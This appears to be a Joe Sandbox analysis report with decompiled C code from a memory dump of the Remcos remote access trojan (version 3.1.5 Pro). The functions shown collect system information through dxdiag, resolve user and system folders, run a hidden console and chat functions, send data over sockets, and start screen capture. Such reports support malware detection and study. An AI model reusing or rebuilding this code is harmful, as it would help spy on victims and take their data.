				_t97 = __edx;
				_push(_t65);
				_t102 = _a4;
				E004020CC(_t65,  &_v104, __edx, __eflags, _t102 + 0x1c);
				SetEvent( *(_t102 + 0x34));
				_t27 = L00401F75( &_v108);
				E00404286( &_v108,  &_v60, 4, 0xffffffff);
				_t113 = (_t110 & 0xfffffff8) - 0x5c;
				E004020CC(_t65, _t113, _t97, _t118, 0x46c238);
				_t114 = _t113 - 0x18;
				E004020CC(_t65, _t114, _t97, _t118,  &_v76);
				E00416DD0( &_v140, _t97);
				_t115 = _t114 + 0x30;
				_t106 =  *_t27 - 0x3a;
				if(_t106 == 0) {
					_t66 = E0040A15B(L00401F75(L00401E29( &_v116, _t97, __eflags, 0)));
					__eflags = _t66;
					if(_t66 == 0) {
						L7:
						L00401E54( &_v116, _t97);
						L00401FA7();
						L00401FA7();
						__eflags = 0;
						return 0;
					}
					 *0x46baec = E0040A1B1(_t66, "DisplayMessage");
					_t42 = E0040A1B1(_t66, "GetMessage");
					_t100 = "CloseChat";
					 *0x46bae4 = _t42;
					_t43 = E0040A1B1(_t66, "CloseChat");
					_t116 = _t115 - 0x18;
					 *0x46bae8 = _t43;
					 *0x46bae1 = 1;
					E004020CC(_t66, _t116, "CloseChat", __eflags, 0x46c2b8);
					_push(0x74);
					E00404A6E(_t66, _t102, _t100, __eflags);
					L10:
					_t68 = HeapCreate(0, 0, 0);
					__eflags =  *0x46bae4(_t68,  &_v140);
					if(__eflags != 0) {
						_t116 = _t116 - 0x18;
						E0040208B(_t68, _t116, _t100, __eflags, _v140, _t48);
						_push(0x3b);
						E00404A6E(_t68, _t102, _t100, __eflags);
						HeapFree(_t68, 0, _v176);
					}
					goto L10;
				}
				_t109 = _t106 - 1;
				_t120 = _t109;
				if(_t109 != 0) {
					goto L7;
				}
				_t54 =  *0x46baec(L00401F75(L00401E29( &_v116, _t97, _t120, _t109)));
				_t121 = _t54;
				if(_t54 == 0) {
					goto L7;
				}
				E0040425F(_t65,  &_v80, 0x45f6a8);
				_t97 =  &_v84;
				E00416CF4(_t65, _t115 - 0x18,  &_v84);
				_push(0x3b);
				E00404A6E(_t65, _t102,  &_v84, _t121);
				L00401ED0();
				L4:
				while(GetMessageA( &_v52, _t109, _t109, _t109) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}

APIs

SetEvent.KERNEL32(?,?), ref: 004053D6
GetMessageA.USER32 ref: 00405484
TranslateMessage.USER32(?), ref: 00405493
DispatchMessageA.USER32 ref: 0040549E
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 00405541
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405579

Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2

Strings

CloseChat, xrefs: 00405509
GetMessage, xrefs: 004054F8
DisplayMessage, xrefs: 004054EC

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: cbdc46063b6153f0f722e241a127364d97f305325752f7b7019a36a53b88fb1f
Instruction ID: 40e2d3d5fc2c9ffc40a8a8c2273da8ce5b9fbac120eee0586a17121859013f1e
Opcode Fuzzy Hash: cbdc46063b6153f0f722e241a127364d97f305325752f7b7019a36a53b88fb1f
Instruction Fuzzy Hash: E8419371604301ABC600BB75DD5A9AF7BA9EF81315F40053FF505A31E2EF389909CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004179B3, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004179B3(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v560;
				char _v572;
				void* _v576;
				char _v580;
				char _v584;
				char _v600;
				char _v608;
				char _v616;
				char _v620;
				void* _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v644;
				void* _v648;
				char _v652;
				void* _v672;
				void* __ebx;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t77;

				_t73 = __edx;
				_t77 = __ecx;
				_t54 = __edx;
				L00401F4D(__edx,  &_v644);
				_t36 = __edx + 0xffffffd0;
				_t85 = _t36 - 7;
				if(_t36 <= 7) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M00417B8F))) {
						case 0:
							_push(L"Temp");
							goto L14;
						case 1:
							__ecx =  &_v620;
							__eax = E0041669D(__ebx,  &_v620);
							__ecx =  &_v644;
							__eax = L00401EDA( &_v644, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L14;
						case 3:
							_push(L"WinDir");
							goto L14;
						case 4:
							__eax = L00416F6C(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								__ecx =  &_v620;
								E0040425F(__ebx, __ecx, L"\\SysWOW64") = E0043918F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v580;
								__eax = E00403010( &_v580, __edx, __eax);
								__ecx =  &_v652;
								__eax = L00401EDA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v584;
								__eax = L00401ED0();
								__ecx =  &_v608;
								__eax = L00401ED0();
								L4:
								__ecx =  &_v620;
								goto L5;
							} else {
								__ecx =  &_v572;
								E0040425F(__ebx, __ecx, L"\\system32") = E0043918F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v628;
								__eax = E00403010( &_v628, __edx, __eax);
								__ecx =  &_v652;
								__eax = L00401EDA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v632;
								__eax = L00401ED0();
								__ecx =  &_v608;
								__eax = L00401ED0();
								__ecx =  &_v584;
								L5:
								__eax = L00401ED0();
								goto L15;
							}
							L16:
						case 5:
							_push(L"ProgramFiles");
							goto L14;
						case 6:
							_push(L"AppData");
							goto L14;
						case 7:
							_push(L"UserProfile");
							L14:
							L00409DCB(_t54,  &_v644, E0043918F(_t54, _t57, _t85));
							goto L15;
					}
				}
				L15:
				__imp__GetLongPathNameW(L00401ECB( &_v644),  &_v524, 0x208);
				_t39 = E0040425F(_t54,  &_v560, _a4);
				_t40 = E0040425F(_t54,  &_v636, "\\");
				E00403010(_t77, E00403010( &_v600, E00417D4C(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				return _t77;
				goto L16;
			}

APIs

GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 00417B0A

Strings

UserProfile, xrefs: 00417ADE
ProgramFiles, xrefs: 00417AD0
\SysWOW64, xrefs: 00417A7F
WinDir, xrefs: 00417A1A, 00417A3C, 00417A8E
AppData, xrefs: 00417AD7
Temp, xrefs: 004179E5
SystemDrive, xrefs: 00417A10
\system32, xrefs: 00417A2D

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-1609423294
Opcode ID: d9419fcc739b8a316a348d5f7169f2ad597bef89d8b132f4787c0214b612faa3
Instruction ID: 6472f6f80a3df67a90006e08033efa2a9a0bfe3ce3822e9bff2fa4fccbff765a
Opcode Fuzzy Hash: d9419fcc739b8a316a348d5f7169f2ad597bef89d8b132f4787c0214b612faa3
Instruction Fuzzy Hash: 224126711082005AC314FB62DC52DEFB3A9AE90798F10093FF556620E2EE789F49C69B

Uniqueness

Uniqueness Score: -1.00%

Function 00413012, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 112
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00413012(void* __ecx, void* __eflags, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t35;
				void* _t46;
				void* _t54;
				void* _t55;
				void* _t90;
				void* _t92;
				void* _t94;
				void* _t95;

				_t97 = __eflags;
				E00403086(_t54,  &_v76, E0040425F(_t54,  &_v52, E0043918F(_t54, __ecx, __eflags, L"temp")), _t90, _t97, L"\\sysinfo.txt");
				L00401ED0();
				_t55 = 0;
				ShellExecuteW(0, L"open", L"dxdiag", L00401ECB(L00409E6B( &_v52, L"/t ", 0,  &_v76)), 0, 0);
				L00401ED0();
				E004020B5(0,  &_v28);
				_t92 = 0;
				do {
					_t35 = L00401ECB( &_v76);
					_t87 =  &_v28;
					E00417334(_t35,  &_v28);
					Sleep(0x64);
					_t92 = _t92 + 1;
				} while (L00409DB7() != 0 && _t92 < 0x4b0);
				if(L00409DB7() == 0) {
					DeleteFileW(L00401ECB( &_v76));
					E00404818(_t55,  &_v180, 1);
					_t95 = _t94 - 0x10;
					_t93 = 0x46bacc;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t46 = E004049D2(_t87);
					_t102 = _t46;
					if(_t46 != 0) {
						_t93 = _t95 - 0x18;
						_t16 =  &_a4; // 0x412c62
						L00402F73(_t55, _t95 - 0x18, L00402F97( &_v52, _t16, 0x46c238), _t102,  &_v28);
						_push(0x97);
						E00404A6E(_t55,  &_v180, _t49, _t102);
						L00401FA7();
						L00404DD5( &_v180);
						_t55 = 1;
					}
					L00404DF9(_t55,  &_v180, _t93);
				}
				L00401FA7();
				L00401ED0();
				L00401FA7();
				return _t55;
			}

0x00413012
0x0041303c
0x00413045
0x0041304a
0x00413073
0x0041307c
0x00413084
0x00413089
0x0041308b
0x0041308e
0x00413093
0x00413098
0x0041309f
0x004130a8
0x004130ae
0x004130c4
0x004130d3
0x004130e1
0x004130e6
0x004130f1
0x004130f6
0x004130f7
0x004130f8
0x004130f9
0x004130fa
0x004130ff
0x00413101
0x00413109
0x0041310b
0x00413121
0x00413127
0x00413132
0x0041313a
0x00413145
0x0041314a
0x0041314a
0x00413152
0x00413152
0x0041315a
0x00413162
0x0041316a
0x00413177

APIs

Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00413073

Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417351

Sleep.KERNEL32(00000064), ref: 0041309F
DeleteFileW.KERNEL32(00000000), ref: 004130D3

Strings

/t , xrefs: 00413052
\sysinfo.txt, xrefs: 0041301E
temp, xrefs: 00413023
dxdiag, xrefs: 00413068
open, xrefs: 0041306D
b,A, xrefs: 00413167, 0041310B

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleepchar_traits
String ID: /t $\sysinfo.txt$b,A$dxdiag$open$temp
API String ID: 2701014334-3646109375
Opcode ID: c0b96fd0e9dc31874d92b89d4c1282043b81c78063e8f6c7d63bbf253ca19bec
Instruction ID: ea28d571885b6fcaa569769a0be50a94edd787caab5c3991fe9ce62e94a8c89b
Opcode Fuzzy Hash: c0b96fd0e9dc31874d92b89d4c1282043b81c78063e8f6c7d63bbf253ca19bec
Instruction Fuzzy Hash: 3D31BF71910209AACB14FBA1DC92EEE7739AF50349F40007FB905771E2EF781E4AC699

Uniqueness

Uniqueness Score: -1.00%

Function 004188B1, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E004188B1(void* __ebx, void* __ecx, void* __edx) {
				char _v204;
				void* __edi;
				struct HWND__* _t17;
				void _t22;
				intOrPtr _t24;
				intOrPtr _t25;
				void _t26;
				void _t28;
				void* _t30;
				void* _t34;
				signed int _t37;
				void* _t45;
				void* _t47;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t59;

				_t36 = __ecx;
				_t34 = __ecx;
				AllocConsole();
				_t17 =  *0x46ca6c(__ebx);
				 *0x46bebc = _t17;
				if(_t34 == 0) {
					ShowWindow(_t17, 0);
				}
				_push(_t45);
				E0043A8D6(_t36, "CONOUT$", "a", E00436395(1));
				E00431810(_t45,  &_v204, 0, 0xc8);
				_t47 =  &_v204 - 1;
				do {
					_t22 =  *(_t47 + 1);
					_t47 = _t47 + 1;
				} while (_t22 != 0);
				_t37 = 7;
				memcpy(_t47, "--------------------------\n", _t37 << 2);
				_t51 =  &_v204 - 1;
				do {
					_t24 =  *((intOrPtr*)(_t51 + 1));
					_t51 = _t51 + 1;
				} while (_t24 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t53 =  &_v204 - 1;
				do {
					_t25 =  *((intOrPtr*)(_t53 + 1));
					_t53 = _t53 + 1;
				} while (_t25 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t55 =  &_v204 - 1;
				do {
					_t26 =  *(_t55 + 1);
					_t55 = _t55 + 1;
				} while (_t26 != 0);
				_push(6);
				memcpy(_t55, "\n * BreakingSecurity.net\n", 0 << 2);
				asm("movsw");
				_t59 =  &_v204 - 1;
				do {
					_t28 =  *(_t59 + 1);
					_t59 = _t59 + 1;
					_t85 = _t28;
				} while (_t28 != 0);
				_t30 = memcpy(_t59, "--------------------------\n\n", 0 << 2);
				asm("movsb");
				return E004047F8(_t85, _t30, 7);
			}

APIs

AllocConsole.KERNEL32(00000001), ref: 004188BD
GetConsoleWindow.KERNEL32 ref: 004188C3
ShowWindow.USER32(00000000,00000000), ref: 004188D6

Strings

* Remcos v, xrefs: 00418933
--------------------------, xrefs: 00418980
--------------------------, xrefs: 0041891D
* BreakingSecurity.net, xrefs: 00418965
3.1.5 Pro, xrefs: 0041894A
CONOUT$, xrefs: 004188EB

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ConsoleWindow$AllocShow
String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.1.5 Pro$CONOUT$
API String ID: 3461962499-2226434288
Opcode ID: 987e66b2b04c7c3c558ee3f718a5e26cf071ce7e588e9fc2efd773313ed53ea7
Instruction ID: bfc95b620952df2fd153268bde35307eb28a127fe5abf82b9ef8951bce9e7c52
Opcode Fuzzy Hash: 987e66b2b04c7c3c558ee3f718a5e26cf071ce7e588e9fc2efd773313ed53ea7
Instruction Fuzzy Hash: BB212B72808B0525EF10AF155C01FD6B765AF52704F004297E88C7B281EBA66DCA476D

Uniqueness

Uniqueness Score: -1.00%

Function 0044087E, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044087E(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x4571f8) {
					L0043EE85(_t52);
					_t26 = _a4;
				}
				L0043EE85( *((intOrPtr*)(_t26 + 0x3c)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x30)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x34)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x38)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x28)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x2c)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x40)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x44)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00440744(5,  &_v8);
				_v8 =  &_a4;
				return E00440794(4,  &_v8);
			}

APIs

_free.LIBCMT ref: 00440892

Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?), ref: 0043EE9B
Part of subcall function 0043EE85: GetLastError.KERNEL32(?,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?,?), ref: 0043EEAD

_free.LIBCMT ref: 0044089E
_free.LIBCMT ref: 004408A9
_free.LIBCMT ref: 004408B4
_free.LIBCMT ref: 004408BF
_free.LIBCMT ref: 004408CA
_free.LIBCMT ref: 004408D5
_free.LIBCMT ref: 004408E0
_free.LIBCMT ref: 004408EB
_free.LIBCMT ref: 004408F9

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c63880faff989d5ccff85de8c36c4632de699c5cb9251132617d836dac5e14a5
Instruction ID: c522220ac2d5c32fe01852b59e6646c10f04ef358e737e5df1941df93b3e5ff3
Opcode Fuzzy Hash: c63880faff989d5ccff85de8c36c4632de699c5cb9251132617d836dac5e14a5
Instruction Fuzzy Hash: 6B11A476101108AFCF11EF56C942CD93BA6EF08754F0150AAFA188F262DE35EA55DB84

Uniqueness

Uniqueness Score: -1.00%

Function 0043D65F, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 266
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0043D65F(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t149;
				void* _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t166;
				signed int _t167;
				intOrPtr _t169;
				signed int _t172;
				signed int _t173;
				signed int _t175;
				signed int _t195;
				signed int _t196;
				signed int _t199;
				signed int _t204;
				signed int _t207;
				intOrPtr* _t213;
				intOrPtr* _t214;
				signed int _t225;
				signed int _t228;
				intOrPtr* _t229;
				signed int _t231;
				signed int* _t235;
				void* _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t257;
				signed int* _t258;
				intOrPtr* _t259;
				short _t260;
				signed int _t262;
				signed int _t264;
				void* _t266;
				void* _t268;

				_t262 = _t264;
				_t149 =  *0x46a00c; // 0x3dad585e
				_v8 = _t149 ^ _t262;
				_push(__ebx);
				_t207 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v744 = _t207;
				_v728 = E00440972(_t207, __ecx, __edx) + 0x278;
				_push( &_v708);
				_t156 = L0043CDA9(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t266 = _t264 - 0x2e4 + 0x18;
				if(_t156 != 0) {
					_t11 = _t207 + 2; // 0x6
					_t251 = _t11 << 4;
					__eflags = _t251;
					_t157 =  &_v272;
					_v716 = _t251;
					_t213 =  *((intOrPtr*)(_t251 + _t246));
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t157 -  *_t213;
						_t253 = _v716;
						if( *_t157 !=  *_t213) {
							break;
						}
						__eflags =  *_t157;
						if( *_t157 == 0) {
							L8:
							_t158 = _v704;
						} else {
							_t260 =  *((intOrPtr*)(_t157 + 2));
							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
							_v710 = _t260;
							_t253 = _v716;
							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t213 = _t213 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t158;
						if(_t158 != 0) {
							_t214 =  &_v272;
							_t243 = _t214 + 2;
							do {
								_t159 =  *_t214;
								_t214 = _t214 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t214 - _t243 >> 1) + 1;
							_t162 = E0043E61D(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t253 + _t246));
								_t35 = _t207 * 4; // 0xb86e
								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
								_t38 = _t246 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t223 =  &_v272;
								_v712 = _t162 + 4;
								_t166 = E00440264(_t162 + 4, _v720,  &_v272);
								_t268 = _t266 + 0xc;
								__eflags = _t166;
								if(_t166 != 0) {
									_t167 = _v704;
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									E0043629A();
									asm("int3");
									_t169 =  *0x46b508; // 0x0
									return _t169;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t253 + _t246)) = _v712;
									if(_v272 != 0x43) {
										L19:
										_t172 = E0043CAB6(_t207, _t223, _t246,  &_v700);
										_t225 = _v704;
										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t225 = _v704;
											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
										}
									}
									__eflags = _t207 - 2;
									if(_t207 != 2) {
										__eflags = _t207 - 1;
										if(_t207 != 1) {
											__eflags = _t207 - 5;
											if(_t207 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
										}
									} else {
										_t258 = _v728;
										_t244 = _t225;
										_t235 = _t258;
										 *(_t246 + 8) = _v708;
										_v712 = _t258;
										_v720 = _t258[8];
										_v708 = _t258[9];
										while(1) {
											_t64 = _t246 + 8; // 0x8b56ff8b
											__eflags =  *_t64 -  *_t235;
											if( *_t64 ==  *_t235) {
												break;
											}
											_t259 = _v712;
											_t244 = _t244 + 1;
											_t204 =  *_t235;
											 *_t259 = _v720;
											_v708 = _t235[1];
											_t235 = _t259 + 8;
											 *((intOrPtr*)(_t259 + 4)) = _v708;
											_t207 = _v744;
											_t258 = _v728;
											_v720 = _t204;
											_v712 = _t235;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t88 = _t246 + 8; // 0x8b56ff8b
												_t195 = L00447F5C(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x457400, 0x7f,  &_v528,  *_t88, 1);
												_t268 = _t268 + 0x1c;
												__eflags = _t195;
												_t196 = _v704;
												if(_t195 == 0) {
													_t258[1] = _t196;
												} else {
													do {
														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
														_t196 = _t196 + 1;
														__eflags = _t196 - 0x7f;
													} while (_t196 < 0x7f);
													_t199 = E004330D1( &_v528,  *0x46a170, 0xfe);
													_t268 = _t268 + 0xc;
													__eflags = _t199;
													_t258[1] = 0 | _t199 == 0x00000000;
												}
												_t103 = _t246 + 8; // 0x8b56ff8b
												 *_t258 =  *_t103;
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L38;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v720;
											 *(_t258 + 4 + _t244 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t173 = _t207 * 0xc;
									_t110 = _t173 + 0x457340; // 0x40e12c
									 *0x45346c(_t246);
									_t175 =  *((intOrPtr*)( *_t110))();
									_t228 = _v724;
									__eflags = _t175;
									if(_t175 == 0) {
										__eflags = _t228 - 0x46a2a8;
										if(_t228 != 0x46a2a8) {
											_t257 = _t207 + _t207;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L43;
											} else {
												_t128 = _t257 * 8; // 0x30ff068b
												L0043EE85( *((intOrPtr*)(_t246 + _t128 + 0x28)));
												_t131 = _t257 * 8; // 0x30ff0c46
												L0043EE85( *((intOrPtr*)(_t246 + _t131 + 0x24)));
												_t134 = _t207 * 4; // 0xb86e
												L0043EE85( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
												_t231 = _v704;
												 *((intOrPtr*)(_v716 + _t246)) = _t231;
												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
											}
										}
										_t229 = _v732;
										 *_t229 = 1;
										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
									} else {
										 *(_v716 + _t246) = _t228;
										_t115 = _t207 * 4; // 0xb86e
										L0043EE85( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
										L0043EE85(_v732);
										 *(_t246 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L10;
				} else {
					L1:
					L2:
					return E0042F61B(_v8 ^ _t262);
				}
				L47:
			}

APIs

Part of subcall function 00440972: GetLastError.KERNEL32(00000000,?,00434E55,?,?,?,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 00440976
Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
Part of subcall function 00440972: SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409EA
Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0

_memcmp.LIBVCRUNTIME ref: 0043D909
_free.LIBCMT ref: 0043D97A
_free.LIBCMT ref: 0043D993
_free.LIBCMT ref: 0043D9C5
_free.LIBCMT ref: 0043D9CE
_free.LIBCMT ref: 0043D9DA

Strings

@, xrefs: 0043D957
C, xrefs: 0043D7C7

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C$@
API String ID: 1679612858-1810246019
Opcode ID: d206b5de6287ad100f648a7d92be551892ec8ba6376f2bd188670c6f30b94e7c
Instruction ID: 52565f1e93295bb36fd0e3f4fb9911c45a8627ad54808d25164a72537c1ebd07
Opcode Fuzzy Hash: d206b5de6287ad100f648a7d92be551892ec8ba6376f2bd188670c6f30b94e7c
Instruction Fuzzy Hash: F1B13775E012199BDB24DF19D885BAEB7B4FF48304F2045AAE849A7351E734AE90CF84

Uniqueness

Uniqueness Score: -1.00%

Function 004152D7, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176
sleeptimeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004152D7() {
				intOrPtr* _t42;
				void* _t45;
				char* _t54;
				void* _t72;
				long _t78;
				void* _t83;
				struct _SECURITY_ATTRIBUTES* _t85;
				struct _SECURITY_ATTRIBUTES* _t92;
				void* _t131;
				void* _t132;
				void* _t140;
				void* _t141;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				E00450918(0x451ece, _t146);
				_push(_t141);
				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
				_t92 = 0;
				 *((intOrPtr*)(_t146 - 4)) = 0;
				_t149 =  *0x46bea0 - _t92; // 0x0
				if(_t149 == 0) {
					_t147 = _t147 - 0xc;
					_t131 = _t146 - 0x68;
					E00413D5E(_t131);
					__imp__GdiplusStartup(0x46bea0, _t131, 0);
				}
				_t150 =  *0x46bd70 - _t92; // 0x0
				if(_t150 == 0) {
					L00401EDA(0x46c880, _t132, _t141, E0041481D(_t146 - 0x40));
					L00401ED0();
				}
				_t42 = L00401F75(L00401E29(0x46c578, _t132, _t150, 0x19));
				_t45 = L00401ECB(E00416C32(_t146 - 0x58, L00401E29(0x46c578, _t132, _t150, 0x1a)));
				_t134 =  *_t42;
				L00401EDA(0x46c868,  *_t42, 0x46c868, E004179B3(_t146 - 0x40,  *_t42, _t45));
				L00401ED0();
				L00401ED0();
				CreateDirectoryW(L00401ECB(0x46c868), _t92);
				L00401F4D(_t92, _t146 - 0xb0);
				L00401F4D(_t92, _t146 - 0x80);
				 *(_t146 - 0x11) = _t92;
				 *0x46bd6b = 1;
				_t54 =  *((intOrPtr*)(_t146 + 8));
				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
